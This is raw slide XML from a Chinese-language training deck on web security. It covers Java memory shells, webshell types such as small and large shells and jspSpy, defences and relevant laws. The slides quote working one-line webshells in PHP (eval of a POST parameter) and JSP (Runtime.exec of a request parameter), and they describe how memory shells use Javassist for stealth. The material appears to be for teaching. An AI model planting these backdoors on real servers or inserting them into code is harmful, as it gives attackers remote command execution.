              <a:t>：可以在运行时使用java编码动态修改和生成Java类的字节码，而无需了解底层的虚拟机指令内存马利用这个特性，在运行时动态地修改类定义，执行恶意操作，或者注入新的功能，由于Javassist提供的高级API使得操作字节码变得相对简单，内存马可以利用这一便利性，更容易地实现其恶意目的，同时也提高了自身的隐蔽性和生存能力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>回忆：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之一句话木马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中：&lt;?php @eval($_POST['cmd']);?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中：&lt;%Runtime.getRuntime().exec(request.getParameter("cmd"));%&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之小马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>体积小、容易被上传，一般只具备文件上传功能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之一句话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>体积大、功能全，具有文件管理、数据库管理、账号权限管理的能力，可以理解为是一个集成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>合集。例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jspSpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>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en-US" altLang="zh-CN"/>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基本概念</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214120"/>
            <a:ext cx="11701145" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JavaWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目中的小马展示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154305" y="2228215"/>
            <a:ext cx="5764530" cy="2632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commondata" val="eyJoZGlkIjoiMTllZmQwODg0Y2NiNzNlZTkyZjVlZTFkMjIzODQxM2QifQ=="/>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21522</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>863</Paragraphs>
  <Slides>57</Slides>
  <Notes>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57</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="68" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>仿宋_GB2312</vt:lpstr>
      <vt:lpstr>WPS</vt:lpstr>
      <vt:lpstr>Package</vt:lpstr>
      <vt:lpstr>web security</vt:lpstr>
      <vt:lpstr>基本概念 </vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念-在谈tomcat</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念-基于Servlet的内存马</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念-基于Spring内存马</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念-内存马防御</vt:lpstr>
      <vt:lpstr>基本概念</vt:lpstr>
      <vt:lpstr>基本概念-法律法规</vt:lpstr>
      <vt:lpstr>基本概念-法律法规</vt:lpstr>
      <vt:lpstr>基本概念-法律法规</vt:lpstr>
      <vt:lpstr>基本概念-法律法规</vt:lpstr>
      <vt:lpstr>基本概念-法律法规</vt:lpstr>
      <vt:lpstr>结语</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RafaelSun</cp:lastModifiedBy>
  <cp:revision>1061</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-25T02:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-30T12:11:44Z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E42767E41DD54175B7B64A6C1414626D_12</vt:lpwstr>
  </property>
</Properties>
</file>